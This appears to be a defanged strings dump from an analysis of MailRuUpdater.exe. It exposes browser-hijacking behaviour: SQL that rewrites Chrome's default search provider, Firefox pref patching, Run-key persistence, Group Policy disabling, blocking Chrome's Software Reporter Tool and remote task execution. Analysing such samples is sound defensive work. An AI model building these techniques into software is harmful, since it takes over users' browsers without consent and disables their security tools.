.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@V?$map@UProcessKey@sysinfo@mailru@@UProcessInfo@23@U?$less@UProcessKey@sysinfo@mailru@@@std@@V?$allocator@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@6@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@U?$pair@$$CBUProcessKey@sysinfo@mailru@@UProcessInfo@23@@std@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$oserializer@Vtext_woarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@
.?AV?$singleton@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@serialization@boost@@
.?AV?$singleton_wrapper@V?$extended_type_info_typeid@UProcessKey@sysinfo@mailru@@@serialization@boost@@@detail@serialization@boost@@
.?AV?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@
.?AV?$singleton_wrapper@V?$iserializer@Vtext_wiarchive@archive@boost@@UProcessKey@sysinfo@mailru@@@detail@archive@boost@@@detail@serialization@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AVconnection_data@downloader_impl@http@mailru@@
.?AVconnection_data_file@downloader_impl@http@mailru@@
.?AVconnection_data_string@downloader_impl@http@mailru@@
.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@std@@
.?AV?$sp_counted_impl_p@Vdownload_limitation@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_file@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_string@downloader_impl@http@mailru@@@detail@boost@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
Inappropriate I/O control opera
9999999
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
< <$<(<,<
0 0$0(0,0
313C3O3a3m3r3
0%0s0
343f3
8:X:#;i;n;};
8(8&:5:_:
;";';&<5<[<
9%9U9u9
3?4X4
8œ9h9
:&:;:@:{:
4"414&585
0"0)00090
3%3s3
2/2x2c3}3
9$9(9,90949
878<8[8`8
77R7c7o7v7
5#6-676\6
8 8%8*888
? ?$?(?,?0?4?8?
8 8$8(8,8&9
2%3u3z3
9 9$9(9,9
5 5$5(5,50545~5
6$6,666<6
2"2(22282*323
2#20262=2^2
5"=)=2=9=
708}8!:(:
7 7-787@7_7
1 1$1(1,1
0'0-020@0
3#323@3#525@5
: :$:(:,:0:4:
5,5054585<5@5
3 3$3(3,3034383<3
5 5$5(5,50545
4 4$4(4,484<4
6 6$6(6,6064686<6
8 8$8(8,8084888<8
9(9,90949|9
=@>\>`>|>
< <$<0<@<
> >$>(>,>0>4>8><>
8 8$8(8,808
? ?$?(?,?0?4?8?<?
1 1$1(1,101
6 6$6(6,6064686<6@6
8 8$8(8,8084888<8@8
1 1$1(1,1014181<1@1
6 6$6(6,6
2$2,282\2|2
7,787@7`7
2,282\2|2
3 3(343\3
7,787\7|7
:,:8:@:`:
?(?4?<?\?
>$>,>8>\>|>
;(;4;<;\;
1$1,181`1
0 0(040\0
1 1(1,1|1
2 202@2`2
> >$>(>,>0>|>
praetorian.exe
qipguard.exe
BrowserManager.exe
BrowserManagerGUI.exe
QHActiveDefense.exe
QHSafeTray.exe.exe
QHWatchdog.exe
GuardMailRu.exe
JMail.Ru\Sputnik\Report
hXXp://xml.binupdate.mail.ru/audit_config.mrdj
Start new check operation
o failed to parse. New report Created
restore mail.ru for:
operation_type
checker->Check failed, msg =
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj successfully fetched
FFExtensions/FFVbm/Url
Hp/Url
Dse/Url
Vbm/Url
Google\Chrome\User Data\Safe Browsing Extension Blacklist
Advapi32.dll
MGoogle/Chrome/User Data
Google/Chrome/Application
Software\Policies\Google\Chrome
hXXp://xml.binupdate.mail.ru/ext_storage.mrdj
Google Chrome
Google/Chrome/User Data/Default
Google/Chrome/Application/chrome.exe
Software/Google/Chrome/BLBeacon
URLS
manifest.json
sqlite3_reset
sqlite3_exec
Web Data
chrome.exe
select k.url from meta m, keywords k where m.key='Default Search Provider ID' and m.value=k.id
select id, short_name from keywords where url like '%go.mail.ru%' COLLATE NOCASE
No go.mail.ru in chromium
SELECT id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
DELETE FROM keywords WHERE short_name = '@MAIL.RU'
SELECT * FROM keywords
ALTER TABLE keywords ADD COLUMN alternate_urls VARCHAR DEFAULT ''
ALTER TABLE keywords ADD COLUMN search_terms_replacement_key VARCHAR DEFAULT ''
INSERT INTO keywords
id, short_name, keyword, favicon_url, url, show_in_default_list, safe_for_autoreplace, originating_url, date_created, usage_count, input_encodings, suggest_url, prepopulate_id, created_by_policy, instant_url, last_modified, sync_guid
@Mail.Ru','go.mail.ru','hXXp://go.mail.ru/favicon.ico','hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg',1,1,'',1333701777,0,'windows-1251','hXXp://suggests.go.mail.ru/ff3?q={searchTerms}',%PREPOPULATE_ID%,0,'',0,'03095DE3-A6E7-4793-A20C-399A0F4A92E1'
UPDATE keywords SET short_name = '
@Mail.Ru', keyword = 'go.mail.ru', favicon_url = 'hXXp://go.mail.ru/favicon.ico', url = 'hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg%RFR%',show_in_default_list = '1' WHERE id = '%ID%'
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'go.mail.ru' COLLATE NOCASE
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
SELECT id, prepopulate_id FROM keywords
' WHERE key = 'Default Search Provider ID'
' WHERE key = 'Default Search Provider ID Backup'
SELECT value FROM meta WHERE key = 'version'
UPDATE keywords SET suggest_url = '%SUGGEST_URL%' WHERE keyword like '%mail.ru%'
%SUGGEST_URL%
^(chrome-extension://)?(\w{32})?/?
Software/Google/Chrome/Extensions
Sync Data Backup/SyncData.sqlite3
hXXps://clients2.google.com/service/update2/crx
hXXp://xml.binupdate.mail.ru/guard/mrids.mrdj?
Extension from url installed
DefaultSearchProviderSearchURL
DefaultSearchProviderKeyword
&%1$=%2%
mmail.ru
VVV.mail.ru
VVV.go.mail.ru
common_process.exe
{27116687-8CD6-4A82-BA83-5099C3A885BF}
{A12C4AB1-F4D0-4771-8C21-613E9D12491F}
{1079004F-E4EF-4A44-9D1F-7C9CE09CE258}
{901B414B-72A2-48C6-8DCD-29388B8B3E40}
{0ED2394C-62B6-4A80-A342-C2CA0B2A4E82}
{E60E6A0E-4092-4965-85BB-AA1ED8EBBC8E}
{ADAC3638-040C-498C-845A-F89B99705444}
{4519D3B5-465C-4AE2-A905-960CA7D5385C}
{F581DE96-9AA1-45C8-8335-B7445525371A}
{DCEF19BB-AB61-48F4-A7CB-6D677D90D1C2}
{B63A6D16-4F50-47C2-9BF7-A5D6E79C9EFD}
{11A1974E-9BEF-4B50-8E2F-9F25FC775BD1}
{3E57F3FE-4397-4DEA-A19A-760BFCD24242}
{603A8599-628C-4F00-A940-A09F1583A23E}
{D33EDE61-8E43-4C1F-9371-6A240B4DA5C9}
{C74622AC-AC0B-44E5-BDC2-EE39A5FD9EC9}
{ABCAA0D8-A892-481F-9492-ACC63768F659}
{8DC7BF6A-58F3-4740-B600-34E37FFADC21}
{4C1D0C36-25B2-4774-80E8-DAE1E7898A1A}
{96AF929E-B8EB-499E-99A8-095E4262BE26}
{027940D4-10B8-43B6-9707-A4EE47618E1D}
{45DA0BF7-F31B-4360-BF9A-8E7374A78916}
{5552B451-2086-4B64-82C6-732B18E41FCD}
{F9CC112D-19A0-455B-8D85-F5E9CB7D5914}
{0E26AC42-4B6E-4C84-8291-A0CAC999E70D}
{CFB9F60E-912D-43B3-91C9-9E06AE17ADE0}
{3CE4F0C3-2143-491F-8F20-27792166C41F}
{66CD85E0-6D8E-444E-9D71-AED8BA171A26}
{4947360E-E26B-4CC9-BB40-F4A30EDCA39E}
{14737ADB-9F88-47E8-A76F-D365509795AC}
chrome-extension://clpdgmdkdnijjbgmnajolnbnjejoeogm/visual-bookmarks.html
chrome-extension://hcncjpganfocbfoenaemagjjopkkindp/visual-bookmarks.html
chrome-extension://jaocgokledfmfebefgbeokdodbbdjhdd/visual-bookmarks.html
chrome-extension://dhngkpgdbpbkopndlpkicfaiffphdkbo/visual-bookmarks.html
)Software\AppDataLow\Software\Mail.Ru\IE_Bar
Software\Mail.Ru\IE_Bar
Software/Mail.Ru/Updater
Software\Mail.Ru\Flags
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
SOFTWARE/Microsoft/Windows/CurrentVersion/Run
SOFTWARE/Mail.Ru
@Mail.Ru
{09900DE8-1DCA-443F-9243-26FF581438AF}
{58810E75-E249-44C6-B989-11D227263E24}
{91397D20-1446-11D4-8AF4-0040CA1127B6}
{95289393-33EA-4F8D-B952-483415B9C955}
hXXp://mrds.mail.ru/update/2/
hXXp://suggests.go.mail.ru/ie8?q={SearchTerms}
{FFEBBF0A-C22C-4172-89FF-45215A135AC7}
Mail.Ru
iexplore.exe
{37964A3C-4EE8-47b1-8321-34DE2C39BA4D}
{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}
firefox.exe
opera.exe
SOFTWARE/Google/Chrome/Extensions
amigo.exe
nichrome.exe
browser.exe
Yandex.Browser.New
Software/Mail.Ru/ChromeInstaller
hXXp://xml.binupdate.mail.ru/guard/update/version.xml
F777C640-57F8-4ECE-A40B-F571D25C2EFE
.html
opera
launcher.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Google Chrome
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Bromium
Software/Microsoft/Windows/CurrentVersion/Uninstall/Xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/{1B89BC31-F539-4EBD-B94F-C24705C73433}
Software/Microsoft/Windows/CurrentVersion/Uninstall/YandexBrowser
xpom.exe
Software/Microsoft/Windows/CurrentVersion/Uninstall/xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/Amigo
google chrome
firefox
Microsoft/Windows/Start Menu
Microsoft/Windows/
tsearch-metadata.json
prefs.js
sessionstore.js
places.sqlite
cookies.sqlite
Mozilla\Firefox\profiles.ini
Mozilla\Firefox
Lsearch.json
Mozilla Firefox
mailru.xml
<SearchPlugin xmlns="hXXp://VVV.mozilla.org/2006/browser/search/" xmlns:os="hXXp://a9.com/-/spec/opensearch/1.1/">
@Mail.Ru</os:ShortName>
@Mail.Ru</os:Description>
<SearchForm>hXXp://VVV.mail.ru/</SearchForm>
<os:Url type="application/x-suggestions json" method="GET" template="hXXp://suggests.go.mail.ru/ff3?q={searchTerms}"></os:Url>
<os:Url type="text/html" method="GET" template="hXXp://go.mail.ru/search"><os:Param name="q" value="{searchTerms}"/>%PARAMS%%RFR%</os:Url>
extensions.ini
ini keys failed
extensions.json
extensions.json not parsed!
localstore.rdf
extensions.sqlite
PMail.Ru\Tmp\ffvisualbookmarks.7z
install.rdf
d.autoreg
extensions.rdf
extensions.cache
install_options.xml
@Mail.Ru
Mail.ru
Firefox
File: %s
SELECT last_visit_time FROM urls order by last_visit_time DESC LIMIT 1
couldn't create instance of IUrlHistoryStg2
EnumUrls failed
FaviconURLFallback
SuggestionsURL
ie.reg
[-HKEY_USERS\
import
reg.exe
*.dll
%1%version.txt?type=%2%&GUID=%3%&rfr=%4%
metric successfully send, url =
metric send failed, url =
Mail.Ru/Id
Software\Microsoft\Windows\CurrentVersion\Run
Software\Mail.ru\Tech\ptls
Software/Mail.Ru/Guard
R.delay
Mail.Ru/mrst
hXXp://xml.binupdate.mail.ru/tasks/shortcuts.mrdj?
url_argument
key_arg
^(http[s]?:\/\/)?(www\.)?([\w\.-] )([:\/].*)?$
Remote tasks execution started
hXXp://xml.binupdate.mail.ru/tasks.mrdj?
added task to executing task array
Software/Microsoft/Windows/CurrentVersion/Run
Syahoo.com
webalta.ru
yambler.net
yafinder.com
Found mail.ru extension of type
KhXXp://mailruupdater.cdnmail.ru/MailRuUpdater.exe
5Software\Mail.ru\Tech\ptls
SSoftware\Mail.Ru
Allow service process execute task
--uac-passed
mru_uac_passed
Guard@Mail\.ru
SwReporter
software_reporter_tool.log
Error parsing reporter logs:
dFailed to update SwReporter data:
since_last_exec
chrome
hXXp://xml.binupdate.mail.ru/tasks/ext_settings.mrdj?
Terminating update.exe
update.exe
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj?
\bmail\.ru\b
K{61EB20A4-D4D5-4276-A2C9-DCCE8CE9F633}
{A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}
qip.ru
Start proceed Google Chrome
Google Chrome is done
Google Chrome is not done
Start proceed Firefox
Firefox is done
Firefox is not done
hXXp://xml.binupdate.mail.ru/tasks/sg_settings.mrdj?
hXXp://go.mail.ru/?chverfix=1&fr=chverfix_sg
hXXp://go.mail.ru/search?q={SearchTerms}&ieverfix=1&fr=ieverfix_dse
hXXp://xml.binupdate.mail.ru/tasks/sg_settings.mrdj
hXXp://xml.binupdate.mail.ru/sputnik/spmrids.mrdj successfully fetching failed
Svk.com/audios
ok.ru/music
my.mail.ru/music
e.mail.ru/messages/inbox
vk.com/app
ok.ru/game
ok.ru/app
my.mail.ru/app
games.mail.ru
SELECT id, url, last_visit_time FROM urls where url like '%%%1%%%' order by last_visit_time DESC limit 1
SELECT url, last_visit_date FROM moz_places where url like '%%%1%%%' and guid != '' and guid notnull order by last_visit_date desc limit 1
\Toolbar\Custom\Packages\hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml\Components\smartbox
Yandex\Toolbar\state.json
yasearch-xb\plugins.json
Software\Mail.Ru\Updater
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
uac-passed
Kamigo_tmp.exe
hXXp://binupdate.mail.ru/amigo/version2.xml
internet_tmp.exe
hXXp://binupdate.mail.ru/chrome/version3.xml
internetupdater_tmp.exe
hXXp://binupdate.mail.ru/chrome/version2.xml
0.0.0.0
inttoam_tmp.exe
hXXp://binupdate.mail.ru/chrome/internet_to_amigo.xml
28.0.1501.430
hXXp://binupdate.mail.ru/updater/version.xml
mrutmp.exe
.mru_update_service
C:\logging
amsg
last_chrome
ovr_chrome
Google/Chrome/User Data/Default/History
hXXp://xml.binupdate.mail.ru/friends.mrdj
oUpdater.Mail.Ru
Mail.Ru Group
Updater.Mail.Ru exist
Updater.Mail.Ru: Error during coping file, rc =
Service::Update update operation is proceed
Updater.Mail.Ru: StartService: RegisterServiceCtrlHandler returned error
Updater.Mail.Ru: StartService: SetServiceStatus returned error
Updater.Mail.Ru: SERVICE_CONTROL_STOP
Updater.Mail.Ru: SERVICE_CONTROL_INTERROGATE
Updater.Mail.Ru: SERVICE_CONTROL_SHUTDOWN
%1% (%2%)
\StringFileInfo\xx
notepad.exe
SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
0123456789 ,.
Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
sqlite3_prepare16_v2
sqlite3_step
sqlite3
SQLite error %1% returned by %2%
SQLite error code %1%, file %2%
sAbsolutePath: <%s>
Incorrect firefox js file
stub.exe
hXXp://xml.binupdate.mail.ru/tenv.mrdj
filter.cfg
metrics.csv
http.csv
%Y%m%d
%Y-%m-%d
%H:%M:%S
%Y%m%dT%H%M%S%F%q
%Y-%m-%d %H:%M:%S%F%Q
%Y-%b-%d %H:%M:%S%F %z
%O:%M:%S%F
Invalid url
jMail.ru/ifrm
SOFTWARE/Mail.ru
Internet Explorer/iexplore.exe
Global\651CB287-2277-4F76-84C6-1D61E868304B
Mail.ru/CommonCache
HTTP code %1%
%Y-%b-%d
l%Y%m%d
SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
asio-58CCDC44-6264-4842-90C2-F3C545CB8AA7-%u-%p
hXXp://xml.binupdate.mail.ru/cache_policy.mrdj
rCachingPolicy/Urls
mscoree.dll
madvapi32.dll
skernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
888816666554443
6666554443
!6666554443
%5N.log
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe
Mail.Ru updater
1.17.0.150

MailRuUpdater.exe_1028:

.text
`.rdata
@.data
.rsrc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
SHA1 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
.EKSWU
DlSHA512 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>
FtPS
FTPG
FTPj
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by <appro@openssl.org>
|$@3|$<3
Camellia for x86 by <appro@openssl.org>
RC4 for x86, CRYPTOGAMS by <appro@openssl.org>
<0|1<:}-
<0|9<:}5
w%s( 
8%u(j
uXj.hLj
ugj.hLj
gj.hdi
 FTPj
F\ FTP
<x%uY
><%uB
t.Jx 
;*u%C
Lj.hL
j.Yf;
_tcPVj@
.PjRW
f;F.se
?sqliu
 2 34 567
?%Y-%u
m-%du
?%H:%u
M:%Su
C:\desktop_apps\SputnikLib/log_ng.h
C:\desktop_apps\CommonFiles/url_params_common.hpp
mailru::url_params::formalize_common_params
mailru::url_params::AddWinVerInfo
mailru::url_params::AddChromeMetrics
mailru::url_params::AddToolVer
mailru::url_params::AddOtherProcessInfo
..\CommonFiles\audit\audit.cpp
..\CommonFiles\audit\audit_browsers_manager.cpp
c:\desktop_apps\commonfiles\audit\audit_browsers_manager.h
ReportTime
..\CommonFiles\audit\audit_browser_settings.cpp
mailru::AuditBrowserSettings::MakeReport
) report successfully done
Make report failed
mailru::AuditBrowserSettings::ScheduleReportCheck
mailru::AuditBrowserSettings::CollectReportInfo
mailru::AuditBrowserSettings::CheckReport
error report structer
..\CommonFiles\audit\audit_google_chrome.cpp
mailru::AuditGoogleChrome::CheckerHomepageCh::RestoreChild
mailru::AuditGoogleChrome::CheckerDefaultSearchCh::RestoreChild
mailru::AuditGoogleChrome::CheckerVbmCh::RestoreChild
:Incorrect key length
Unable to read chrome blocklist
Chrome blocklist file is not valid
chrome blocklist contains unsupported elements
..\CommonFiles\chrome-safe-browsing.cpp
mailru::chromium::ChromeSafeBrowsing::ReadSafeBrowsingFile
shard_header.add_prefix_count > kMaxAddSubChunksCount
Unable to open "%s" for writing
RegCreateKeyTransactedW
C:\desktop_apps\SputnikLib/reg_key.hpp
startup_urls
urls_to_restore_on_startup
..\commonfiles\chromiums.cpp
Chrome
RegOpenKeyTransactedW
RegDeleteKeyTransactedW
KERNEL32.DLL
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
%%%%-%%%%-%%%%-%%%%
C:\desktop_apps\CommonFiles/sql_lite_bind.hpp
..\CommonFiles\chromium_settings.cpp
hXXp://mail.ru
hXXp://VVV.mail.ru
browser.show_home_button
session.restore_on_startup
yandex\.ru. clid
mailru::chromium::settings::search_url
chrome_settings_overrides
search_url
template_url_data
mailru::chromium::settings::search_url_without_extensions
@MAIL.RU
suggestions_url
suggestions_url_post_params
windows-1251
keyword
mail.ru
D15371FE-C188-4E99-9841-A91F3BCBCCC3
search_terms_replacement_key
search_url_post_params
favicon_url
hXXp://go.mail.ru/favicon.ico
image_url
image_url_post_params
instant_url
instant_url_post_params
originating_url
alternate_urls
default_search_provider_data.template_url_data
suggest_url
default_search_provider.name
default_search_provider.search_url
go.mail.ru
keystore_encryption_bootstrap_token
chrome_url_overrides
chrome-extension://
extensions.settings.
hXXp://mail.ru/cnt/9824
mail.ru
mailru::chromium::settings::url_from_ext_id
extensions.known_disabled
error %s
update_url
.enabled
hXXp://xml.binupdate.mail.ru/amigo/check_policy.amg?
check_policy.amg not loaded
check_policy.amg NOT decoded
check_policy.amg NOT parsed
mailru::chromium::settings::InstallExtensionFromUrlNoThrow
Disabling dse in GPO failed: %s
Looking for local GPO failed: %s
yasearch.native_comps.hXXp://bar-widgets.yandex.ru/packages/approved/176/manifest.xml#smartbox.all.settings.searchName
hXXp://VVV.mail.ru/cnt/7861
hXXp://agent.mail.ru/ru/download/agent_windows/download.html?sputnik=1
hXXp://img.imgsmail.ru/r/agent/favicon.ico
hXXp://mail.ru/cnt/10445
hXXp://VVV.mail.ru/
hXXp://go.mail.ru/search?fr=ntg&q={SearchTerms}
hXXp://go.mail.ru/search?fr=ntg&q=
hXXp://m.mail.ru/cgi-bin/splash?opera=1
hXXp://VVV.mail.ru/cnt/5090
hXXp://go.mail.ru/search?q=%s&fr=ntg
@mail.ru
hXXp://suggests.go.mail.ru/ff3?q={SearchTerm}
hXXp://go.mail.ru/search_images?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_images.ico
hXXp://go.mail.ru/search_video?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_video.ico
hXXp://VVV.mail.ru/cnt/5091
hXXp://redir.opera.com/speeddials/mail.ru
hXXp://redir.opera.com/bookmarks/mail.ru
hXXp://go.mail.ru/search?q=%s&fr=opr11
hXXp://go.mail.ru/search?q={SearchTerms}&fr=ntg
hXXp://suggests.go.mail.ru/ff3?q={searchTerms}
hXXp://mail.ru/cnt/10226
hXXp://go.mail.ru/?pin=1
mailru::default_browser::find_executable
..\CommonFiles\default_browser.cpp
C:\desktop_apps\SputnikLib/com_scope.h
SHORTCUTS PROSEED ERROR: std exception = %s
..\commonfiles\file_util.cpp
C:\desktop_apps\3party\ticpp/ticpp.h
..\CommonFiles\firefox_settings.cpp
mailru::firefox::settings::~settings
browser.startup.homepage
Profile%d
hXXp://go.mail.ru
browser.search.selectedEngine
browser.search.defaultenginename
browser.search.defaulturl
keyword.URL
extensions.enabledAddons
mailru::firefox::settings::is_yandex_elements_intsalled
yasearch@yandex.ru
mailru::firefox::settings::remove_media_viewer
browser.search.suggest.enabled
browser.search.useDBForOrder
Firefox
..\CommonFiles\Firefox_visual_bookmarks.cpp
mailru::firefox::visual_bookmarks::install
mailru::firefox::visual_bookmarks::download
urn:mozilla:item:
mailru::firefox::visual_bookmarks::localstore_rdf
chrome://browser/content/browser.xul#mailru_main_toolbar
(\s*app-profile\s \{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7\}\s rel%\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7\}\s \d )\s*.*
partner_new_url
partner_online_url
hXXps://xtnmailru.cdnmail.ru/go_ffvbm1_update.rdf
chrome://vbmail.ru/skin/vb-logo.png
extensions.autoDisableScopes
extensions.shownSelectionUI
mailru::firefox::enable_visual_bookmarks::PatchExtensionSqlite
mailru::firefox::enable_visual_bookmarks::PatchExtensionIni
mailru::firefox::enable_visual_bookmarks::PatchExtensionJson
updateURL
updateKey
optionsURL
aboutURL
iconURL
icon64URL
Mail.Ru
homepageURL
hXXp://sputnik.mail.ru/
{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
mailru::firefox::enable_visual_bookmarks::is_enabled
mailru::firefox::enable_visual_bookmarks::PatchFileTime
..\CommonFiles\GPOManager.cpp
GetRegistryKey for machine failed
GetRegistryKey for user failed
?mailru::sqlite_bind::column_int64
search_id() = %s
HKEY_USERS ie search url = %s
HKEY_LOCAL_MACHINE ie search url = %s
..\CommonFiles\ie_settings.cpp
Disabling GPO restrictions failed: %s
mailru::reg_keyT<0>::check
ntdll.dll
kernel32.dll
..\CommonFiles\Install_stat.cpp
..\CommonFiles\savestate.cpp
web_data_ver
save_google_state_task::do_task error : item_in_storage.file_serialize
..\CommonFiles\shortcut_check.cpp
c:\desktop_apps\commonfiles\tasks\TaskShortcuts.h
..\CommonFiles\Tasks\RemoteTaskExecuter.cpp
mailru::RemoteTasksExecuter::InitTasks
mailru::RemoteTasksExecuter::ExecuteTask
mailru::RemoteTasksExecuter::FetchTasks
Fetching tasks.mrdj...
Fetching url =
google chrome sync_enabled
..\CommonFiles\Tasks\TaskEmulateWebStoreInstallation.cpp
ERROR google_blocked_mailru_extensions_base::ProceedExtensions std::exception %s !!!
..\CommonFiles\Tasks\TaskGoogleBlockedMailruSettings.cpp
ChromeVbmId
ChromeVbmArchive
..\CommonFiles\Tasks\TaskInstallUpdater.cpp
..\CommonFiles\Tasks\TaskInterface.cpp
..\CommonFiles\Tasks\TaskInstallUpdaterAsService.cpp
cmd_line =
..\CommonFiles\Tasks\TaskPeriodicDisableGPO.cpp
14000000000000000
..\CommonFiles\Tasks\TaskPreventSRT.cpp
mailru::TaskPreventSRT::SendReporterMetric
software_reporter
ReporterLogPattern
invalid map<K, T> key
ERROR: chrome_value is empty
..\CommonFiles\Tasks\TaskRemovePornExtensions.cpp
..\CommonFiles\Tasks\TaskRestoreFFDse.cpp
..\CommonFiles\Tasks\TaskStartGroupBlackList.cpp
mailru::TaskStartGroupBlackList::ProceedGoogleChrome
ProceedGoogleChrome patch prepared
ProceedGoogleChrome start patching
google_chrome object constructed
Google Chrome settings are synced
Google Chrome extensions are synced
TaskStartGroupBlackList::ProceedGoogleChrome failed, error =
ProceedGoogleChrome patch_util.set_was_patch(true);
mailru::TaskStartGroupBlackList::CleanUpChromeStartPages
mailru::TaskStartGroupBlackList::ProceedFirefox
ProceedFirefox is running
